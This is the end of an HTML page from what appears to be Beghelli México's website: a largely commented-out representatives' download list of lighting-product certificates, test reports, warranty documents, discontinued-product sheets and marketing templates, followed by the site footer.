href="assets/files/representants/certificados/CASTEX%20510/CN23EPS9%20001%c2%a0IP66%c2%a0IP67%c2%a0-%c2%a0HZCAS510HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20510/CN23WFTA%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS510HTxxxxWTyyzzz120-277V_extsigned.pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li> </ul> <p>7.14. CASTEX 600</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO CASTEX 600</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20600/INTERTEK-MARINE_BEGHELLI_CASTEX.pdf" target="_blank">CERTIFICATE OF COMPLIANCE CASTEX MARINE 600</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20600/INTERTEK_BEGHELLI_CASTEX-600.pdf" target="_blank">CERTIFICATE OF COMPLIANCE INTERTEK CASTEX 600</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20600/CN23KDLU%20001%c2%a0IP66%c2%a0IP67%c2%a0-%c2%a0HZCAS600HTxxxxWTyyzzz120-277V_extsigned%20(1).pdf" target="_blank">REPORTE DE PRUEBA IP67</a></li> <li><a href="assets/files/representants/certificados/CASTEX%20600/CN239YH0%20001%c2%a0IK10%c2%a0-%c2%a0HZCAS600HTxxxxWTyyzzz120-277V_extsigned%20(1).pdf" target="_blank">REPORTE DE PRUEBA IK10</a></li> </ul> <p>7.15. FAMILIA BOX LED</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO FAMILIA BOXLED</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/BOXLED-UL-VIBRATION_TEST_REPORT.pdf" target="_blank">BOXLED UL VIBRATION TEST REPORT</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/BOXLED_62471.pdf" target="_blank">BOXLED 62471</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/BOXMIDI_IP66-IK09.pdf" target="_blank">BOXMIDI IP66 IKO6</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/BOXMINI_IP66-IK09.pdf"" target="_blank">BOXMINI IP66 IK09</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/CKT180522-003-01R_BoxLED.PDF" target="_blank">CKT180522 003 O1R</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/CoFC_70134989_EN.pdf" target="_blank">CERTIFICATE OF COMPLIANCE BOXLED</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/FOOD%20EQUIPMENT%20NSF.pdf" target="_blank">CUST IBTEREK CUST FILE DOWNLOAD</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/ce_boxled.pdf" target="_blank">CE CONFORMITY DECLARATION</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/11904715%20-%20BL726LED%20(1).PDF" target="_blank">BOXLED MIDI UL VIBRATION TEST REPORT</a></li> <li><a href="assets/files/representants/certificados/FAMILIA%20BOXLED/11904715%20-%20BL736LED.PDF" target="_blank">BOXLED UL VIBRATION TEST REPORT</a></li> </ul> <p>7.16. HELIOS</p> <ul> <li><a href="assets/files/representants/certificados/2025/23DOM05316A00R01_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO HELIOS</a></li> <li><a href="assets/files/representants/certificados/HELIOS/ANC2201A00003579_2025%20(1).pdf" target="_blank">CERTIFICADO DE CONFORMIDAD NOM-031-ENERO</a></li> <li><a href="assets/files/representants/certificados/HELIOS/BKC200094MR-Beghelli%20North%20America%20-%20Solar%20Light-ROHS%20%20Rep.(3).pdf" target="_blank">RoHS INSPECTING REPORT BKCT HELIOS</a></li> <li><a href="assets/files/representants/certificados/HELIOS/Beghelli%20Rohs%20Certification.jpg" target="_blank">CERTIFICATE OF CONFORMITY</a></li> </ul> <p>7.17. LUCE SOLARE ELITE</p> <ul> <li><a href="assets/files/representants/certificados/2025/23DOM05316A00R01_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD</a></li> <li><a href="assets/files/representants/certificados/LUCE%20SOLARE%20ELITE/ANC2201A00003579_2025%20(1).pdf" target="_blank">CERTIFICADO DE CONFORMIDAD NOM-031-ENERO</a></li> </ul> <p>7.18. LUMINARIOS DE EMERGENCIA Y SEÑALIZACIÓN INTERIOR</p> <ul> <li><a href="assets/files/representants/certificados/LUMINARIOS%20DE%20EMERGENCIA%20Y%20SEÑALIZACION%20INTERIOR/19DOM02994A07R05.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> </ul> <p>7.19. LUMINARIOS DE EMERGENCIA Y SEÑALIZACIÓN EXTERIOR</p> <ul> <li><a href="assets/files/representants/certificados/LUMINARIOS%20DE%20EMERGENCIA%20Y%20SEÑALIZACION%20INTERIOR/19DOM02994A07R05.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> </ul> <p>7.20. PIATTO</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/PIATTO/ce_piatto.pdf" target="_blank">CE CONFORMITY DECLARATION</a></li> </ul> <p>7.21. PLANEX</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/PLANEX/BeghelliUSA_Self_Declaration_for_RoHS_Compliance-PLANEX.pdf" target="_blank">SELF DECLARATION FOR RoHS COMPLIANCE</a></li> <li><a href="assets/files/representants/certificados/PLANEX/CertificateofCompliance-E465534.pdf" target="_blank">CERTIFICATE OF COMPLIANCE -E465534</a></li> <li><a href="assets/files/representants/certificados/PLANEX/CertificateofCompliance-E476316.pdf" target="_blank">CERTIFICATE OF COMPLIANCE -E476316</a></li> </ul> <p>7.22. PLANEX SELECCIONABLE</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/PLANEX%20SELECCIONABLE/E358902-Vol1-20230706_PLANEX%20-%20CoC%20(1).pdf" target="_blank">CERTIFICATE OF COMPLIANCE</a></li></ul> <p>7.23. POWER LIGHT</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> </ul> <p>7.24. PRODUCTOS RIG-A-LIGHT</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02993A06R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> </ul> <p>7.25. ROCK</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/ROCK/ROCK_REP.CHECA.pdf" target="_blank">CE CONFORMITY DECLARATION</a></li> </ul> <p>7.26. SANIFICAARIA 30</p> <ul> <li><a href="assets/files/representants/certificados/SANIFICAARIA%2030/ANC2201C00004366_2023.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/SANIFICAARIA%2030/ANC2101C00015759_DEFINITIVO.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO ANC2101C00015759</a></li> </ul> <p>7.27. SANIFICAARIA 200</p> <ul> <li><a href="assets/files/representants/certificados/2025/ANC2101C00015759_ILIMITADO.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/SANIFICAARIA%20200/ANC2101C00015753_DEFINITIVO.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO ANC2101C00015753</a></li> <li><a href="assets/files/representants/certificados/SANIFICAARIA%20200/UL%20E520297_SanificaAria.pdf" target="_blank">AIR FILTER APPLIANCES, PORTABLE</a></li> </ul> <p>7.28. SPADA</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/SPADA/E476316-UL_PROOF.pdf" target="_blank">LIGHT EMITTING DIODE SURFACE NOUBTED LUMINARIES</a></li> <li><a href="assets/files/representants/certificados/SPADA/INTERTEK-SANITATION%20LISTED.pdf" target="_blank">AUTHORIZATION TO MARK</a></li> </ul> <p>7.29. STRADA</p> <ul> <li><a href="assets/files/representants/certificados/STRADA/ANC2001C00017039_2023.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/STRADA/ANC2101A00005876_2022.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO ANC2101A00005876</a></li> </ul> <p>7.30. VALORE</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/VALORE/UL_E476316.pdf" target="_blank">UL E476316</a></li> </ul> <p>7.31. NUVOLA SL</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02995A02R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/NUVOLA/C0418156%20-%20002.pdf" target="_blank">NSF INTERNATIONAL OFFICIAL LISTING</a></li> <li><a href="assets/files/representants/certificados/NUVOLA/E476316-20170518-CertificateofCompliance.pdf" target="_blank">CERTIFICATE OF COMPLIANCE</a></li> </ul> <p>7.32. FAMILIA ACCIAIO</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02990A09R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li> <li><a href="assets/files/representants/certificados/ACCIAIO/CKT180522-003-02R_AcciaioBX910ECO.PDF" target="_blank">TEST REPORT ACCIAIO ECO BX910</a></li> <li><a href="assets/files/representants/certificados/ACCIAIO/CKT180522-003-03R_AcciaioBX920LED.PDF" target="_blank">TEST REPORT ACCIAIO ECO BX920</a></li> <li><a href="assets/files/representants/certificados/ACCIAIO/CKT180522-003-04R_AcciaioBX940LED.PDF" target="_blank">TEST REPORT ACCIAIO ECO BX940</a></li> <li><a href="assets/files/representants/certificados/ACCIAIO/CSA-FAMILIA%20ACCIAIO%20LED.pdf" target="_blank">CERTIFICATE OF COMPLIANCE</a></li> <li><a href="assets/files/representants/certificados/ACCIAIO/FOOD%20EQUIPMENT%20NSF.pdf" target="_blank">AUTHORIZATION TO MARK</a></li> <li><a href="assets/files/representants/certificados/ACCIAIO/Informe%20de%20resultados%20IK09.pdf" target="_blank">INFORME DE RESULTADOS IK09</a></li> </ul> <p>7.33. WALLPACK</p> <ul> <li><a href="assets/files/representants/certificados/2025/19DOM02995A02R06_2025.pdf" target="_blank">CERTIFICADO DE CONFORMIDAD DE PRODUCTO</a></li></ul> <h3>8. OTROS/VARIOS</h3> <ul> <li><a href="assets/files/representants/documentos/otros/BeghelliUSA_Self_Declaration_for_RoHS_Compliance-PLANEX.pdf" target="_blank">CERTIFICADO ROHS PLANEX</a></li> <li><a href="assets/files/representants/documentos/otros/BKC200094MR-Beghelli_North_America-Solar_Light-ROHS.pdf" target="_blank">CERTIFICADO ROHS HELIOS</a></li> <li><a href="assets/files/representants/documentos/intertek/INTERTEK-SANITATION LISTED.pdf" target="_blank">SANITATIONLISTED BS100, Tempesta, BoxLED, Acciaio, Acciaio Eco, Spada, WLX, Bravado, Bolla, Plura Luce (25/jun/20)</a></li> <li><a href="assets/files/representants/documentos/otros/BOXLED-UL-VIBRATION_TEST_REPORT.pdf" target="_blank">BOXLED VIBRATION TEST REPORT (25/jun/20)</a></li> <li><a href="assets/files/representants/documentos/otros/BOXMIDI_IP66-IK09.pdf" target="_blank">BOXLED MIDI IP66 & IK09</a></li> <li><a href="assets/files/representants/documentos/otros/BOXMINI_IP66-IK09.pdf" target="_blank">BOXLED MINI IP66 & IK09</a></li> <li><a href="assets/files/representants/documentos/otros/BOXLED_62471.pdf" target="_blank">BOXLED Libre de riesgo fotobiológico</a></li> <li><a href="assets/files/representants/documentos/otros/ENEC_CA04.09291_STRADA.pdf" target="_blank">STRADA IP66</a></li> <li><a href="assets/files/representants/documentos/otros/Clean-rooms Declaration.pdf" target="_blank">Certificados Cuartos Limpios</a></li> <li><a href="assets/files/representants/documentos/otros/LM6_Alloy_Detail.pdf" target="_blank">Certificado de aleación para BOXLED</a></li> <li><a href="assets/files/representants/documentos/otros/IK_BS101.pdf" target="_blank">IK BS101</a></li> <li><a href="assets/files/representants/documentos/otros/BS100LED_IK.pdf" target="_blank">IK BS100</a></li> <li><a href="assets/files/representants/documentos/otros/RESISTENCIA.POLICARBONATO.pdf" target="_blank">Materiales resitentes al policarbonato</a></li> <li><a href="assets/files/representants/documentos/otros/INTERTEK_NSF-ANSI2.pdf" target="_blank">NSF/ANSI2 BS100, ACCIAIO, BRAVADO, BOLLA. BOXLED, SPADA, ACCIAIO ECO, PLURA LUCE (27/jun/2018)</a></li> <li><a href="assets/files/representants/certificados/BS101LED%20ECO/BEGHELLI%20NORTH%20AMERICA%20NSF%20-%20Certificate%20-%20C0816989.pdf" target="_blank">Reconocimiento NSF FAMILIA Illumina</a></li> </ul> <h3>9. GARANTÍAS Y POLÍTICAS</h3> <ul> <li><a href="assets/files/representants/certificados/2025/REPORTE%20PARA%20APLICACION%20DE%20GARANTIA%202024.pdf" target="_blank">Formato Reporte Alpicación de Garantía (2024)</a></li> </ul> <ul> <li><a href="assets/files/representants/certificados/2025/POLITICA%20DE%20GARANTIA%20A%20CLIENTES%202024.pdf" target="_blank">Políticas de Garantía a Cliente (2024)</a></li> </ul> <ul> <li><a href="assets/files/representants/certificados/2025/PROCESO%20DE%20DEVOLUCIÓN%20DE%20GARANTIAS%202024.pdf" target="_blank">Proceso Devolución de Garantías (2024)</a></li> </ul> <h3>10. DESCONTINUADOS</h3><p>10.1. Fichas de productos descontinuados</p> <ul> <li><a href="assets/files/representants/descontinuados/acciaio_extreme.pdf" target="_blank">ACCIAIO EXTREME</a></li> <li><a href="assets/files/representants/descontinuados/ACCIAIO-BX950-960.pdf" target="_blank">ACCIAIO BX950 & BX960</a></li> <li><a href="assets/files/representants/descontinuados/bs102led.pdf" target="_blank">BS102LED</a></li> <li><a href="assets/files/representants/descontinuados/bs2000.pdf" target="_blank">BS2000 FLUORESCENTE</a></li> <li><a href="assets/files/representants/descontinuados/avior.pdf" target="_blank">AVIOR</a></li> <li><a href="assets/files/representants/descontinuados/BS105.pdf" target="_blank">BS105</a></li> <li><a href="assets/files/representants/descontinuados/BS500_ORION.pdf" target="_blank">BS500 ORION</a></li> <li><a href="assets/files/representants/descontinuados/CAMPANELLA.pdf" target="_blank">CAMPANELLA</a></li> <li><a href="assets/files/representants/descontinuados/CANES.pdf" target="_blank">CANES</a></li> <li><a href="assets/files/representants/descontinuados/carella_led.pdf" target="_blank">CARELLA LED</a></li> <li><a href="assets/files/representants/descontinuados/carellaes34_6561.pdf" target="_blank">CARELLA FLUO.</a></li> <li><a href="assets/files/representants/descontinuados/CONVEXA_LED.pdf" target="_blank">CONVEXA LED</a></li> <li><a href="assets/files/representants/descontinuados/ES07_CUBUS.pdf" target="_blank">CUBUS</a></li> <li><a href="assets/files/representants/descontinuados/ECCO_LUNA.pdf" target="_blank">ECCO LUNA</a></li> <li><a href="assets/files/representants/descontinuados/HIGH_BAY.pdf" target="_blank">HIGH BAY</a></li> <li><a href="assets/files/representants/descontinuados/HZ120-CASTOR.pdf" target="_blank">HZ120 CASTOR</a></li> <li><a href="assets/files/representants/descontinuados/LYRA.pdf" target="_blank">LYRA ES32</a></li> <li><a href="assets/files/representants/descontinuados/nuvola.pdf" target="_blank">NUVOLA</a></li> <li><a href="assets/files/representants/descontinuados/PIATTO_LED.pdf" target="_blank">PIATTO LED</a></li> <li><a href="assets/files/representants/descontinuados/planex.pdf" target="_blank">PLANEX (la que hay en stock y se descontinuara)</a></li> <li><a href="assets/files/representants/descontinuados/power_light-hb.pdf" target="_blank">POWER LIGHT HIGHBAY</a></li> <li><a href="assets/files/representants/descontinuados/SEF_8609.pdf" target="_blank">SEF </a></li> <li><a href="assets/files/representants/descontinuados/stripled_lite.pdf" target="_blank">STRIPLED LITE </a></li> <li><a href="assets/files/representants/descontinuados/sirius.pdf" target="_blank">SIRIUS </a></li> <li><a href="assets/files/representants/descontinuados/tempesta.pdf" target="_blank">TEMPESTA</a></li> <li><a href="assets/files/representants/descontinuados/toscano.pdf" target="_blank">TOSCANO</a></li> <li><a href="assets/files/representants/descontinuados/tilia.pdf" target="_blank">TILIA </a></li> <li><a href="assets/files/representants/descontinuados/TROFFER.pdf" target="_blank">TROFFER</a></li> <li><a href="assets/files/representants/descontinuados/VIRGO.pdf" target="_blank">VIRGO ES30 </a></li> <li><a href="assets/files/representants/descontinuados/WALLPACK_ELITE.pdf" target="_blank">WALLPACK ELITE</a></li> <li><a href="assets/files/representants/descontinuados/WRAPAROUND.pdf" target="_blank">WRAPAROUND</a></li> <li><a href="assets/files/representants/descontinuados/XLP.pdf" target="_blank">XLP</a></li> </ul> <h3>11. MATERIAL MARKETING </h3> <p>11.1. FORMATOS</p> <ul> <li><a href="assets/files/representants/formatos/requisitos_distribuidor.docx" target="_blank">DOC: LLENADO POR DISTRIBUIDOR WEB</a></li> <li><a href="assets/files/representants/formatos/Requisitos_Distribuidor_Pagina_Web.pdf" target="_blank">REQUISITOS PARA APARECER EN WEB</a></li> <li><a href="assets/files/representants/formatos/FORMATO_EXHIBIDORES.pdf" target="_blank">SOLICITUD DE EXHIBIDORES</a></li> <li><a href="assets/files/representants//marketing/FORMATO.DOCX" target="_blank">HOJA MEMBRETADA</a></li> </ul> <p>11.2. PLANTILLAS</p> <ul> <li><a href="assets/files/representants/marketing/2020_carta-OK.pptx" target="_blank">PLANTILLA PARA PRESENTACIONES T. CARTA (HORIZONTAL)</a></li> <li><a href="assets/files/representants/marketing/2020_oficio-OK.pptx" target="_blank">PLANTILLA PARA PRESENTACIONES T. OFICIO (HORIZONAL)</a></li> <li><a href="assets/files/representants/marketing/2020_superlarge-OK.pptx" target="_blank">PLANTILLA PARA PRESENTACIONES SUPER LARGA</a></li> <li><a href="assets/files/representants/formatos/evaluacion_capacitacion.pdf" target="_blank">EVALUACIÓN DE CAPACITACIONES</a></li> </ul> <p>11.3. USO IMAGEN CORPORATIVA</p> <ul> <li><a href="assets/files/representants/marketing/imagen.corporativa.pdf" target="_blank">USO DE IMAGEN CORPORATIVA</a></li> <li><a href="assets/files/representants/marketing/whats.zip" target="_blank">IMÁGENES DE PERFIL WHATSAPP</a></li> </ul> <p>11.4. LOGOS</p> <ul> <li><a href="assets/files/representants/marketing/logos.zip" meta="" http-equiv="Refresh" content="2;URL=descarga.zip" target="_blank">LOGO BEGHELLI CIAN</a></li> </ul> <p>11.5. CATÁLAGO PRODUCTOR EN REMATE Y PRMOCIÓN</p> <ul> <li><a href="assets/files/representants/promociones/PRODUCTOS%20PROMOCIÓN%202023/CATÁLOGO%20PROMOCIÓN%202023%20FINAL%20(4).pdf" target="_blank">CATÁLOGO PRECIOS ESPECIALES 2023</a></li> <li><a href="assets/files/representants/promociones/PRODUCTOS%20PROMOCIÓN%202023/CATÁLOGO%20REMATE%202023%20FINAL%20(2).pdf" target="_blank">CATÁLOGO ARTÍCULOS REMATE 2023</a></li> <li><a href="assets/files/representants/promociones/PRODUCTOS%20PROMOCIÓN%202023/promocion_productos_cuadrado.png" target="_blank">IMAGEN PRECIOS ESPECIALES CUADRADA</a></li> <li><a href="assets/files/representants/promociones/PRODUCTOS%20PROMOCIÓN%202023/promocion_proucto_vertical.png" target="_blank">IMAGEN PRECIOS ESPECIALES VERTICAL</a></li> <li><a href="assets/files/representants/promociones/PRODUCTOS%20PROMOCIÓN%202023/remate-producto_cuadrado.png" target="_blank">IMAGEN ARTICULOS REMATE CUADRADA</a></li> <li><a href="assets/files/representants/promociones/PRODUCTOS%20PROMOCIÓN%202023/remate_producto_vertical.png" target="_blank">IMAGEN ARTICULOS REMATE VERTICAL</a></li> </ul> --> <!-- <p>PARA MAYOR CONFIABILIDAD LE RECOMENDAMOS DESCARGAR EL MATERIAL DIRECTAMENTE DE NUESTRA PÁGINA WEB</p> </div> </section> </main> --> <footer> <img src="assets/img/logo-blue.svg" alt="Beghelli logo azul"> <div class="footer__column"> <h4>Beghelli</h4> <a href="beghelli-group.php">¿Quiénes somos?</a> <a href="authorized-agents.php">Representantes de ventas</a> <a href="investor-relations.php">Distribuidores</a> <a href="partnerships.php">Asociaciones</a> </div> <div class="footer__column"> <h4>Área técnica</h4> <a href="product-literature.php">Catálogos</a> <a href="success-cases.php">Casos de éxito</a> <a href="downloads.php">Información técnica</a> <a href="certifications.php">Certificaciones</a> </div> <div class="footer__column"> <h4>Soporte</h4> <a href="support.php">Preguntas frecuentes</a> <a href="#">Política de privacidad</a> </div> <div class="footer__row-second"> <div class="footer__links"> <a href="https://www.facebook.com/BeghelliMexico/" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-facebook-f"></i> </a> <a href="https://www.instagram.com/beghellimexico/" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-instagram"></i> </a> <a href="https://www.linkedin.com/company/beghelli-méxico/?originalSubdomain=mx" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-linkedin-in"></i> </a> <a href="https://www.youtube.com/channel/UC11tlEqg4pWhmCj8mYY_pNg" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-youtube"></i> </a> <div class="footer__global"> <button id="global-btn"> <i class="fa-regular fa-earth-americas"></i> México <i class="fa-solid fa-chevron-up"></i> </button> <div class="footer__global-drop-up"> <div> <div class="footer__global-links"> <h5>Global Website</h5> <a href="https://www.beghelli.it/it" target="_blank" rel="noopener noreferrer">Italiano</a> <a href="https://www.beghelli.it/en" target="_blank" rel="noopener noreferrer">English</a> <h5>Czech Republic</h5> <a href="https://www.beghelli.it/cs-cz" target="_blank" rel="noopener noreferrer">Czech</a> <a href="https://www.beghelli.it/en-cz" target="_blank" rel="noopener noreferrer">English</a> <a href="https://www.beghelli.it/en-cz" target="_blank" rel="noopener noreferrer">Russian</a> <h5>Germany</h5> <a href="https://www.beghelli.it/de-de" target="_blank" rel="noopener noreferrer">Deutsch</a> <a href="https://www.beghelli.it/en-de" target="_blank" rel="noopener noreferrer">English</a> <h5>Hungary</h5> <a href="https://www.beghelli.it/hu-hu" target="_blank" rel="noopener noreferrer">Magyar</a> <h5>Poland</h5> <a href="https://www.beghelli.it/pl-pl" target="_blank" rel="noopener noreferrer">Polski</a> <h5>Company website</h5> <a href="https://www.beghelliusa.com/" target="_blank" rel="noopener noreferrer">Beghelli Inc. (USA)</a> <a href="https://www.beluce.com/" target="_blank" rel="noopener noreferrer">Beghelli Canada Inc. (Canada)</a> <a href="https://www.beghelli.com.mx/" target="_blank" rel="noopener noreferrer">Beghelli de México (México)</a> <a href="https://www.beghelliasia.com/" target="_blank" rel="noopener noreferrer">Beghelli Asia Pacific Ltd (Hong Kong)</a> <a href="https://www.beghellichina.com/" target="_blank" rel="noopener noreferrer">Beghelli China (People's Respublic of China)</a> <a href="https://www.beghelli.it/cs-cz" target="_blank" rel="noopener noreferrer">Beghelli Elplast (Czhech Republic)</a> <a href="https://www.beghelli.it/de-de" target="_blank" rel="noopener noreferrer">Beghelli Präzisa (Germany)</a> <a href="https://www.beghelli.it/pl-pl" target="_blank" rel="noopener noreferrer">Beghelli Ploska (Poland)</a> <a href="https://www.beghelli.it/hu-hu" target="_blank" rel="noopener noreferrer">Beghelli Hungary (Hungary)</a> <a href="https://www.beghelli.it/it" target="_blank" rel="noopener noreferrer">Beghelli S. p. A. (Italy)</a> </div> </div> </div> </div> </div> <div class="footer__phone"> <h5>Llámanos</h5> <p>Lunes a viernes de 8:00 a 17:00 hrs</p> <i class="fa-light fa-phone-volume"></i> <span>442 221 6215</span> </div> </div> <div class="footer__row-third"> <div class="footer__simple-links"> <a href="privacy-notice.php">Política de privacidad</a> <div> <i class="fa-solid fa-lock"></i> <a href="representant-login.php">Soy representante</a> </div> <div> <i class="fa-solid fa-lock"></i> <a href="providers-login.php">Soy marketing partner</a> </div> </div> <p class="text">© Beghelli México - Av. del Marqués No. 70 Int. 4 Parque Industrial Bernardo Quintana, El Marqués, Qro.</p> </div> </footer> <!-- Scripts --> <script src="js/general.js"></script> <script src="js/collapsibles.js"></script> </body> </body> </html>
Close